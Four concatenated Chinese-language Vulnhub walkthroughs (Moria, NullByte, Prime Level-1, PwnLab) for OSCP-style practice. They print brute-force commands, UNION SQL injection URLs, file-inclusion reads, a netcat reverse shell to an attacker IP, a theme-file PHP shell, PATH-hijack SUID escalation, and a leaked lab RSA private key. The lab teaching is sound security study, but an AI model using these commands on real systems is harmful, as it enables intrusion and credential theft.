Vulnhub靶机Moria1.1 typora-root-url: ./......typora_imgMoria1.1目标靶机的下载地址：https://www.vulnhub.com/entry/moria-1,187/主机发现&端口扫描，开启的端口只有21，22，80端口开启，并且没有FTP匿名登录打开网页信息收集插件Wappalyzer扫出来一个w目录访问DAIn：“那是人类聋子吗？它为什么不听呢？” ---网易有道可以看到这是一个目录，那么我们可以对这个目录进行扫描，使用gobuster工具gobuster dir -u http://10.10.10.202/w/h/i/s/p/e/r/the_abyss/ -w /data/SecLists_Dict/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,html,zip扫出来了一个random.txt看样子是让我们敲门了，但是顺序并不清楚，尝试连接ftp，提示了欢迎Balrog，但是我们不知道密码抓包嘛在Wireshark中，红色背景的流量包通常表示存在错误或异常的网络流量。这些流量包可能违反了协议规范，或者包含了错误的数据。如图所示，可能的敲门端口顺序就是如下77,100,108,108,111,110,54,57，敲门敲了，但是没发现隐藏端口knock -v 10.10.10.202 77 100 108 108 111 110 54 57查了一下，这泥煤的要用ASCII码，推荐一个网址：https://coding.tools/cn/ascii-table77-M，100-d，108-l，108-l，111-o，110-n，54-6，57-9总结就是Mellon69，发现一个.bash_history（文件保存了用户在终端中执行过的命令。）没有下载权限切换上级目录试试，整个系统文件都出来了切换到var/www/html目录有一段乱码真的蠢子，这样就得到了密码解密结果如下 https://www.somd5.com/Balin：flower Oin：rAInbow Ori：spanky Maeglin：fuckoff Fundin：hunter2 NAIn：warrior DAIn：abcdef ThrAIn：darkness Telchar：magic创建好两个字典┌──(root㉿kali)-[/data/demo] └─# cat user.txt Balin Oin Ori Maeglin Fundin NAIn DAIn ThrAIn Telchar ┌──(root㉿kali)-[/data/demo] └─# cat pass.txt flower rAInbow spanky fuckoff hunter2 warrior abcdef darkness magic爆破失败hydra -L user.txt -P pass.txt -t 4 -vV 10.10.10.202 ssh查看源码（没啥用）此时ssh连接的时候拒绝连接了，看样子是限制爆破，所以刚刚爆破失败了等个1-2分钟的样子，手动连吧，只有Ori能登录进行一些基本的信息收集uname -a hostname # 主机名 # 系统信息相关 lsb_release -a cat /etc/os-release cat /proc/version # 权限相关 sudo -l # 查看可以使用sudo的文件 find / -perm -4000 -print 2>/dev/null # 查找 SUID文件 ls -al /etc/cron* # 查看所有计划任务 find / -perm 777 -type f -u root 2>/dev/null # 查看文件权限为777的文件信息 # 其他信息收集 ps -aux netstat -tulnp history 上面都没找到什么，那就回家，看到一个poem.txt文件，并没啥作用，用ls -al列出所有的内容会发现一个.ssh文件夹，进去后有三个和ssh登录的密匙文件，known_hosts文件中包含了一个本地连接的记录，尝试实用ssh连接127.0.0.1，并且是root用户，发现连接成功，至此提权成功-bash-4.2$ ls -al total 8 drwx------ 3 Ori notBalrog 55 Mar 12 2017 . drwxr-x---. 4 root notBalrog 32 Mar 14 2017 .. -rw------- 1 Ori notBalrog 20 Feb 9 23:44 .bash_history -rw-r--r-- 1 root root 225 Mar 13 2017 poem.txt drwx------ 2 Ori notBalrog 57 Mar 12 2017 .ssh -bash-4.2$ cat poem.txt Ho! Ho! Ho! to the bottle I go To heal my heart and drown my woe. RAIn may fall and wind may blow, And many miles be still to go, But under a tall tree I will lie, And let the clouds go sailing by. PS: Moria will not fall! -bash-4.2$ cd .ssh -bash-4.2$ ls -al total 12 drwx------ 2 Ori notBalrog 57 Mar 12 2017 . drwx------ 3 Ori notBalrog 55 Mar 12 2017 .. -rw------- 1 Ori notBalrog 1679 Mar 12 2017 id_rsa -rw-r--r-- 1 Ori notBalrog 392 Mar 12 2017 id_rsa.pub -rw-r--r-- 1 Ori notBalrog 171 Mar 12 2017 known_hosts -bash-4.2$ cat id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEAu+OTcbouwWKZ6JRYBJXSIp9c8N/+w/0R7A0s5K1Kj45FBhpA k0U/eZJIcpZZYUu9a5yfEZFnlUHshVjD12KTvvANIfvTalP0+uGrOSlF/b1tt8Ol VQW8bgvAJXGom881bsUnu5r4BXp0S5HIoRES2k9BHkP7ZmkhknC83D+zTln/2uHv H/piA5x3aFKDz3NzvJQNEjn/U9pivljAVVruXa0TDYDnjexsZtG3Ctse9fQlj7sq sosqmU2aXEu03R/oHN+jlMn2woKiRnUdoCNaNe5/lYS7leMcMl8AI7hEMgJXSudB GCyLuzDvbQgRi3dOFAs72YSuG/dtMNooEHLr4QIDAQABAoIBAQCGpQbDqE3bTgLH lo8g8hC9uQCMqajT4KaYR7TVR444JBc40VVXdHeRcpAydaYlwHZFCN9BYrcdUjni MYNe9Yi1eyeeI+4Us4fKxi/C7d33gWmAGFeB/3NSVV9kNfhDeBFtiSH5Iov8uQ1g Hl/tdOPSyJr8ynD9qfdiDyJ4n7mqOj/zxT9FxHU2MXQIgQlaGrdeJNS28SAi+Qmp W5qqN2cVxL9rhsD29XQu7X7p/rHKpaVOmeCnr8r7mykhW7XZ1oDHypWUyVJQTcag 7LR5iHr4PBT0esCKeGp8HPClGoD7txsH6JHKLqgoOuhzN9yz8LaBpjUtxPx6sIGr nvChTYLVAoGBAOgz2cvnIDImduC8K3BKDfnvT7p9S6qKG/zANCmSIpFvODOWJKMh /cvrpAdhqYibp8irtcFu2MMGbaZiDY6pjXq1FaTsWXaAU1+4ScPG7lARL3zhti7q iUq3KIwk0gJP2Tuta9TOnBk7bIF+q1WCmi0jYIqhPfZPILykhYN/Kt3XAoGBAM8l GS6lowCjsk6S9ru5Iroy+p9G1lds/ab7NXsk3dxRO4zxrrFPSRl/ztjupTTzBhXG /+0cxncwM9JPZEKzeB48RG+BWKtVVUC96WNJvvzI9tIqL1cmyTZj7J3yAeBdwMj8 Qi9hdsABbqPUHrydDePDVsK//E/w6wIt/p2qVp0HAoGBAMOjVCCA9lZqpARLZknw iwAGymT0xjjErjnw8sIHtwpT68VC/lFYBU63lfcGKOHJS78+NR/ptcXzd5UUzhlh 76rwQXE4FVRLYHOogLXruMRLBniwb1/uCYii8w3IxAxgnEW0osKk5U45C/267L5a EG5xfRiwK9WH66wk7bzR+xr3AoGAMbFqqyAdTIf4vJTREBPH2vdj3FX4EZ0Z9LcL C3G6r6HlMVjBWdP1a2KX0r7dbyhl60+EEfP3QJyVsfxNxxqa1FYM7NsQ1HlyLEfi 92i3opjrbVulY7jwSFYMa4+lF5gmKZEqp4cwH7u4OSEoBoN+04cHB01bUCoxlqJG FLjKcn0CgYEAsKVwN6ED885zyrLQcYDkX4/w2gGW6Mrr0pIFnmQlkfGTqT3wZT09 ZMk2LuYPnowQDczFLmMnCw8HskSTIjUCri7vt/E3haMH7JC6YO7WAaRaJ81k9z10 eIJLNgKU5DxCtdKgGeIwlReZSPBBjU5FGtEhfJsL3n3bNYpfGk7ckug= -----END RSA PRIVATE KEY----- -bash-4.2$ cat id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC745Nxui7BYpnolFgEldIin1zw3/7D/RHsDSzkrUqPjkUGGkCTRT95kkhylllhS71rnJ8RkWeVQeyFWMPXYpO+8A0h+9NqU/T64as5KUX9vW23w6VVBbxuC8AlcaibzzVuxSe7mvgFenRLkcihERLaT0EeQ/tmaSGScLzcP7NOWf/a4e8f+mIDnHdoUoPPc3O8lA0SOf9T2mK+WMBVWu5drRMNgOeN7Gxm0bcK2x719CWPuyqyiyqZTZpcS7TdH+gc36OUyfbCgqJGdR2gI1o17n+VhLuV4xwyXwAjuEQyAldK50EYLIu7MO9tCBGLd04UCzvZhK4b920w2igQcuvh Ori@Prison -bash-4.2$ cat known_hosts 127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0= -bash-4.2$ ssh root@127.0.0.1 -i id_rsa Last login: Fri Apr 28 18:01:27 2017 [root@Moria ~]# whoami root本次提权主要还是属于root用户的ssh私匙泄露导致的权限提升，难度不是很大，师傅们如果还有其他思路，欢迎指出。往期推荐【OSCP】Blender软件的信息泄露---VulnOSv2【OSCP】Tr0ll 靶机全系列（1-3），FTP被玩坏了【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略

Vuln靶机NullByte 靶机下载链接：https://www.vulnhub.com/entry/nullbyte-1,126/主机发现利用nmap进行端口扫描，发现ssh端口被放到了777端口，这里需要注意一下，后面使用ssh连接的时候需要使用 -p 77780端口经过目录扫描，发现了一个phpmyadmin数据库管理工具，并使用了SQL注入，弱口令等测试，均没有效果直到下载了主页的这个mAIn.gif文件，得到一个密文kzMb5nVYJw可能是phpmyadmin的root密码去登录phpmyadmin试试（失败），那么就切换思路，既然是在web上，那么还有可能和目录相关查看源码，说这个表单没有连接mysql数据库，密码也很简单，说明可以直接爆破了本着oscp考试不能使用burp专业版，那么就用hydra进行爆破，参数如下hydra -l admin -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.205 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -f参数解析：-l 表示指定一个用户进行爆破（在这里没有实际意义），-P指定一个密码字典-t 指定爆破的线程数量-vV 表示显示爆破的过程http-post-form 表示以表单的形式进行爆破^PASS^ 表示在这个指定的字典中，所有单个密码的一个变量invalid key 表示排除字段，即出现哪些字符表示失败输入这个密码后，就能进入一个搜索框框页面eliteSQL注入利用，一下子全部数据都出来了，说明存在SQL注入漏洞http://10.10.10.205/kzMb5nVYJw/420search.php?usrtosearch=a" or 1=1 -- +那么接下俩判断列，sql语句报错了，说明不存在5列a" order by 5 --+但是奇怪的是，没有数据回显a" order by 3 --+这里需要仔细琢磨下，发现只能使用对应的用户名作为参数isis" order by 3 --+联合注入测试，这个时候就多了一条数据，前面的isis用户的数据也存在isis" union select 1,2,3 --+暴库http://10.10.10.205/kzMb5nVYJw/420search.php?usrtosearch=isis" union select 1,group_concat(schema_name),3 from information_schema.schemata --+发现了两个可能利用的数据库phpmyadmin,seth，由于phpmyadmin是直接连接的mysql服务器，所以不存放mysql密码，可以跳过，所以我们接下来就需要对seth数据库进行枚举暴seth表，敏感表usershttp://10.10.10.205/kzMb5nVYJw/420search.php?usrtosearch=isis" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="seth" --+暴users字段http://10.10.10.205/kzMb5nVYJw/420search.php?usrtosearch=isis" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema="phpmyadmin" and table_name="pma__users" --+暴users数据http://10.10.10.205/kzMb5nVYJw/420search.php?usrtosearch=isis" union select 1,group_concat(id,'-',user,'-',pass),3 from users --+看样子是 一个base64的编码，解密看看，是一个hash，c6d6bd7ebf806f43c76acc3681703b81利用hash识别工具识别解密的结果为md5ramses用户的密码为omega连接ssh（phpmyadmin密码试过了登录失败）查找SUID文件，发现了一个procwatch文件切换到这个目录下面，还发现了一个readme.txt， 我必须要搞定这一坨混乱。不知道在说啥，执行一下这个suid文件，发现还执行了两个命令，sh应该和shell相关，也就是/bin/sh，ps和进程相关，这个时候我们的提权思路就是将提权的代码写入procwatch的相关文件中，而这个操作与sh和ps相关，这样在执行procwatch的时候，由于他具有suid权限，就可以以root身份运行，从而触发提权这里提权的方法呢就是利用软链接+修改环境变量的方式进行提权完整命令如下ramses@NullByte:/var/www/backup$ ln -s /bin/sh ps # 将/bin/sh链接到 ps 这个命令，这样我们执行当前目录下面的 ps 命令（文件）的时候，就会调用/bin/sh创建一个shell ramses@NullByte:/var/www/backup$ ls # 此时就发现多了一个文件ps procwatch ps readme.txt ramses@NullByte:/var/www/backup$ export PATH=.:$PATH # 添加当前目录为环境变量，这个.代表当前目录，放在前面表示环境变量会以前后顺序，依次读取环境变量，放在前面是为了提高当前目录为环境变量的优先级 ramses@NullByte:/var/www/backup$ echo $PATH .:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games ramses@NullByte:/var/www/backup$ ./procwatch # 此时执行这个文件，就能创建一个shell，而它是suid文件。执行它的时候是以root的身份执行的，所以创建的shell就是root身份的shell。 # whoami root # cd /root # cat proof.txt adf11c7a9e6523e630aaf3b9b7acb51d It seems that you have pwned the box, congrats. Now you done that I wanna talk with you. Write a walk & mAIl at xly0n@sigAInt.org attach the walk and proof.txt If sigAInt.org is down you may mAIl at nbsly0n@gmAIl.com USE THIS PGP PUBLIC KEY -----BEGIN PGP PUBLIC KEY BLOCK----- Version: BCPG C# v1.6.1.0 mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK +z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58 kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8 TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU Gms= =PiAQ -----END PGP PUBLIC KEY BLOCK-----至此提权成功，这个靶机有很多种可以getshell的方法，比如利用SQL注入写入一句话木马，读取mysql配置文件获取密码信息，然后登录phpmyadmin，也能获取ramses用户的密码信息，当然写可以不写一句话木马，直接写反弹shell的php也可以，详细请参考如下文章，写的非常棒https://blog.csdn.net/Bossfrank/article/details/131880155往期推荐红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学Linux 32位Crossfire游戏缓冲区溢出独立开发零显卡AI引擎！媲美DeepSeek，附源码【oscp】Tr0ll 靶机全系列（1-3），FTP被玩坏了神器分享 红队快速打点工具-DarKnuclei从零开始学SQL注入（sql十大注入类型）：技术解析与实战演练【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【渗透测试】12种rbash逃逸方式总结利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细

Vuln靶机Prime_Series_Level-1 typora-copy-images-to: upload主机发现端口扫描80端口目录扫描，发现这是一个wordpress站点利用wpscan对网站后台进行暴力破解，并收集可能的用户信息，爆破失败了，但是发现了一个用户victorwpscan --url http://10.10.10.203/wordpress -e u -P /data/SecLists_Dict/Passwords/xato-net-10-million-passwords-100000.txt利用ssh爆破（失败）hydra -lvictor -P /data/SecLists_Dict/Passwords/darkweb2017-top1000.txt -t 4 -vV 10.10.10.203 ssh利用wfuzz测试一下有没有其他的文章没显示出来的wfuzz -u http://10.10.10.203/wordpress/?page_id=FUZZ -z range,1-1000 --sc 200继续查看目录扫描的结果，翻到一个dev，被嘲讽了你好,现在你处于0级阶段在实际的渗透测试中，我们应该使用我们的工具在网络上进行深入挖掘。快乐的黑客。看看还有没有其他文件gobuster dir -u http://10.10.10.203 -w /data/SecLists_Dict/Discovery/Web-Content/directory-list-1.0.txt -x html,txt,php,js有一个secret.txt文件，大致意思呢就是说让我们进行一个模糊测试，这个测试的参数下面有一个location.txt文件，如果没有扫出来，你可以利用下面这个开源字典，帮助你更好的通过oscp考试访问https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web1. WFUZZ ==================================================================================== # # ###### # # ###### ###### # # # # # # # # # ##### # # # # # ## # # # # # # ## ## # # # # # # # # #### ###### ###### ==================================================================================== -------------------------------------------------------------------------------------- (i) USE WFUZZ TO ENUMERATE CORRECT PARAMETER FOR A PAGE. --------------------------------------------------------------------------------------- COMMNAD = wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://website.com/secret.php?FUZZ=something And the result is given below 000216: C=200 70 L 500 W 2006 Ch "configs" 000200: C=200 70 L 500 W 2006 Ch "cm" 000201: C=200 70 L 500 W 2006 Ch "cmd" 000195: C=200 70 L 500 W 2006 Ch "classified" 000197: C=200 70 L 500 W 2006 Ch "client" 000204: C=200 70 L 500 W 2006 Ch "coke" Finishing pending requests... ---------------------------------------------------------------------------------------------------------------------- (ii) BUT ABOVE COMMND FAILED IF PAGE ALWAYS RETURN 200(HTTP REPONSE). NOW OUR MODIFIED COMMAND IS =======> ---------------------------------------------------------------------------------------------------------------------- COMMAND = wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://website-ip/index.php?FUZZ=something And it will return result which is given below. Total requests: 950 ================================================================== ID Response Lines Word Chars Payload ================================================================== 000357: C=200 70 L 500 W 2006 Ch "file" Total time: 3.753362 Processed Requests: 950 Filtered Requests: 949 Requests/sec.: 253.1063 Here we can see C=200(Our HTTP Respone from server). 7 L ==> It means 7 lines return by server. 500 W ==> It means 19 words total count by wfuzz. 2006 Ch ==> It means 206 total chars count by wfuzz which is return by server. After using filter we can remove wrong parameter from our output and right output with right parameter we get. -------------------------------------------------------------------------------------------------------- (*)WORKING WITH FILTERS: | (i) If we want to filter words then we used switch --hw (words_lenth. In above example --hw 12) | (ii) To filter lenth then we used --hl(In above above example this would be --hl 7) (iii) For chars we used --hh (In above example this would br --hh 206) | (iv) For response code we use --hc. And always we attach --hc 404. Because this is common for all. | -------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------- (iii) USE WFUZZ TO FIND OUT SUBDOMAINS. ---------------------------------------------------------------- COMMAND ==> wfuzz -c -w /usr/share/seclists//usr/share/seclists/Discovery/DNS --hc 404 --hw 617 -u website.com -H "HOST: FUZZ.website.com" USE filter to reach your actual subdomAIns like below command. COMMAND ==> wfuzz -c -w /usr/share/seclists//usr/share/seclists/Discovery/DNS --hc 404 --hw 7873 -u hnpsec.com -H "HOST: FUZZ.hnpsec.com"上wfuzzwfuzz -u http://10.10.10.203/?FUZZ=location.txt -w /data/SecLists_Dict/Discovery/Web-Content/directory-list-1.0.txt --hw 12发现了一个file参数做一些更好的, 好的，现在你找到了确切的参数,现在挖掘更多的下一个<br>在其他php页面上使用‘secrettier36o’参数更有趣。那么根据提示修改参数file为secrettier360，继续fuzz，只发现了两个相关的php文件wfuzz -u http://10.10.10.203/FUZZ.php?secrettier360=location.txt -w /data/SecLists_Dict/Discovery/Web-Content/directory-list-1.0.txt --sc 200进行测试，”最后你得到了正确的参数“┌──(root㉿kali)-[~] └─# curl http://10.10.10.203/image.php?secrettier360=location.txt <html> <title>HacknPentest</title> <body> <img src='hacknpentest.avif' alt='hnp security' width="1300" height="595" /></p></p></p> </body> finaly you got the right parameter<br><br><br><br></html>说是得到了正确的参数，看样子是文件包含，之前读取的是一个txt文件 location.txt，那么直接包含/etc/passwd，之后又发现了这个用户后面写着一个提示，说password.txt文件在/home/saket文件夹下面找到了密码follow_the_ippseccurl http://10.10.10.203/image.php?secrettier360=/home/saket/password.txt测试了两个用户的ssh皆失败了利用那就wordpress密码碰撞，找到之前写文章的用户victor进行登录，登录成功其他的文件都不能修改，只有这一个Twenty Nineteen主题下的secret.php可以修改填写反弹shell脚本并修改攻击机器开启监听这个路径是wordpress主题文件下的默认路径，使用curl请求即可反弹shellcurl http://10.10.10.203/wordpress/wp-content/themes/twentynineteen/secret.php创建交互式终端python -c 'import pty; pty.spawn("/bin/bash")';切换到wordpress根目录，找到了数据库密码wordpress yourpasswordhere登录mysqlmysql -uwordpress -pyourpasswordhere只有victor一个用户，密码我们已经知道了，没有其他东西了，利用数据库密码登录这两个用户试试（均失败）www-data@ubuntu:/home$ ls ls saket victor www-data@ubuntu:/home$ su saket su saket Password: yourpasswordhere su: Authentication fAIlure www-data@ubuntu:/home$ su victor su victor Password: yourpasswordhere su: Authentication fAIlure切换到home下面包含了一个user.txt可能用得上识别hash类型，看样子是md5尝试过好几个解密网站都失败了利用sudo -l查看可以使用sudo的文件，有一个enc，执行一下需要我们输入密码在opt文件夹下面可以找到密码信息执行，但是有两个文件，enc.txt，key.txt没有权限读取接下来加上sudo，提示了一个good此时该文件夹下面出现了两个文件其中key.txt是一个提示信息，加密后的结果为366a74cb3c959de17d61db30591c39d1因此，将字符串“ippsec”转换为md5哈希并使用它来获得您的真实形式enc.txt是一段乱码nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=有一个key，一段密文，但是没有偏移量，普通AES需要偏移量但是ECB的加密模式不需要解密结果为Dont worry saket one day we will reach to our destination very soon. And if you forget your username then use your old password ==> "tribute_to_ippsec" Victor,切换用户成功再次利用sudo -l利用sudo执行这个文件后，可以看到下面有一个提示，没有找到相关文件 not found，看样子是让我们写入一个脚本进行提权if you can defeat me then challenge me in front of you /home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found利用刚刚反弹shell的php脚本进行反弹，再用sudo执行此文件即可提权成功echo 'php /var/www/html/wordpress/wp-content/themes/twentynineteen/secret.php' > /tmp/challenge chmod +x /tmp/challenge sudo /home/victor/undefeated_victor至此提权成功往期推荐红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学Linux 32位Crossfire游戏缓冲区溢出独立开发零显卡AI引擎！媲美DeepSeek，附源码【oscp】Tr0ll 靶机全系列（1-3），FTP被玩坏了神器分享 红队快速打点工具-DarKnuclei从零开始学SQL注入（sql十大注入类型）：技术解析与实战演练【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【渗透测试】12种rbash逃逸方式总结利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细

PwnLab init-文件包含、反弹shell、提权--靶机渗透思路讲解 如果需要Vulnhub靶机链接，可以后台私信【PwnLab】，关于网安学习群，可以后台添加作者备注【进群】即可首页有一个登录框他没有验证码，我们试试暴力破解开始爆破了，全部失败，哈哈哈nmap全端口扫描试试有mysql服务，再爆破一下数据库，使用MSF框架use auxiliary/scanner/mysql/mysql_login set rhosts 192.168.71.1 //设置目标服务器的ip地址 set rport 3306 //设置目标端口，为MySQL开启的端口号，默认是3306 set username root //设置用户名，默认即为root set pass_file /home/kali/pass.txt //指定密码字典文件的路径 run //开始爆破 爆破失败。。。。。。在url上面有一个page，猜测是文件包含漏洞，我们包含/etc/passwd，没有效果php filter伪协议试试也不行这些都试过了，那么直接包含index呢，出来了index的源码，就可以发现它的包含规则不能包含后缀解码看看，对这个lang的cookie进行文件包含<?php //Multilingual. Not implemented yet. //setcookie("lang","en.lang.php"); if (isset($_COOKIE['lang'])) { include("lang/".$_COOKIE['lang']); } // Not implemented yet. 御剑目录扫描一下包含upload，并base64解码，获取源码<?php session_start(); if (!isset($_SESSION['user'])) { die('你没有登录.'); } ?> <html> <body> <form action='' method='post' enctype='multipart/form-data'> <input type='file' name='file' id='file' /> <input type='submit' name='submit' value='Upload'/> </form> </body> </html> <?php if(isset($_POST['submit'])) { if ($_FILES['file']['error'] <= 0) { $filename = $_FILES['file']['name']; $filetype = $_FILES['file']['type']; $uploaddir = 'upload/'; $file_ext = strrchr($filename, '.'); $imageinfo = getimagesize($_FILES['file']['tmp_name']); $whitelist = array(".jpg",".jpeg",".gif",".avif"); if (!(in_array($file_ext, $whitelist))) { die('Not allowed extension, please upload images only.'); } if(strpos($filetype,'image') === false) { die('Error 001'); } if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') { die('Error 002'); } if(substr_count($filetype, '/')>1){ die('Error 003'); } $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext; if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) { echo "<img src=\"".$uploadfile."\"><br />"; } else { die('Error 4'); } } } ?> login源码，我们看到了有一个config.php引用，而且还是在当前目录<?php session_start(); require("config.php"); $mysqli = new mysqli($server, $username, $password, $database); if (isset($_POST['user']) and isset($_POST['pass'])) { $luser = $_POST['user']; $lpass = base64_encode($_POST['pass']); $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?"); $stmt->bind_param('ss', $luser, $lpass); $stmt->execute(); $stmt->store_Result(); if ($stmt->num_rows == 1) { $_SESSION['user'] = $luser; header('Location: ?page=upload'); } else { echo "Login failed."; } } else { ?> <form action="" method="POST"> <label>用户名: </label><input id="user" type="test" name="user"><br /> <label>密 码: </label><input id="pass" type="password" name="pass"><br /> <input type="submit" name="submit" value="Login"> </form> <?php } config包含解码，好有了mysql密码mysql连接指定好数据库找到指定表名就能看到用户密码了，密码有==号的话，那么大概率就是base64编码解码登录试试登录成功了，只允许图片上传我们分析之前找到的文件上传源码，是白名单<?php session_start(); if (!isset($_SESSION['user'])) { die('你没有登录.'); } ?> <html> <body> <form action='' method='post' enctype='multipart/form-data'> <input type='file' name='file' id='file' /> <input type='submit' name='submit' value='Upload'/> </form> </body> </html> <?php if(isset($_POST['submit'])) { if ($_FILES['file']['error'] <= 0) { $filename = $_FILES['file']['name']; $filetype = $_FILES['file']['type']; $uploaddir = 'upload/'; $file_ext = strrchr($filename, '.'); $imageinfo = getimagesize($_FILES['file']['tmp_name']); $whitelist = array(".jpg",".jpeg",".gif",".avif"); if (!(in_array($file_ext, $whitelist))) { die('Not allowed extension, please upload images only.'); } if(strpos($filetype,'image') === false) { die('Error 001'); } if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') { die('Error 002'); } if(substr_count($filetype, '/')>1){ die('Error 003'); } $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext; if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) { echo "<img src=\"".$uploadfile."\"><br />"; } else { die('Error 4'); } } } ?> 图片马gif正常上传我们用dirb扫到一个目录gif上传成功伪协议包含不成功分析index.php源代码，它对cookie的值作为路径，这个参数为lang<?php //Multilingual. Not implemented yet. //setcookie("lang","en.lang.php"); if (isset($_COOKIE['lang'])) { include("lang/".$_COOKIE['lang']); } // Not implemented yet. 那我们就添加一个cookielang=../upload/66c30a7180c399c3188ff89f1e2c5c02.gif此时回到首页蚁剑连接试试这里不要忘了添加cookie反弹测试nc，有e参数，可以用nc反弹shellnc 10.0.0.190 80 -e /bin/bash 反弹成功终端升级echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py python /tmp/asdf.py 切换root账号，弱口令成功了。。。。如果不用弱口令，正常情况是这样的，找到数据库中的密码和用户猜测这个用户能用登录该系统，但是登录成功后，没什么利用价值切换用户kane，里面有一个msgmike文件，查看它，这有一个命令查看这个文件没有权限我们切换这个mike用户，不能登录，鉴权失败，我们也就无法查看这个文件然而当我们调用cat命令的时候，cat会从以上目录来寻找，如果我们添加.到$PATH环境变量，则会先从当前目录来寻找cat指令，相当于我们自己创建一个读文件的cat指令，用这个指令来读新建取/home/mike/msg.txt文件，我们新建一个cat文件，并添加执行权限，依次执行以下命令这样当我们再次运行./msgmike命令的时候，就会触发当前目录下的cat(/bin/sh)，我们就会提升到mike权限：我们切换这个用户的跟目录发现有个msg2root查看发现一个bin/bash会话，不断尝试，直到如下结果; /bin/bash -p才能够以root的权限查看flag.txt往期推荐不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学防溯源小技巧ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术，ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录

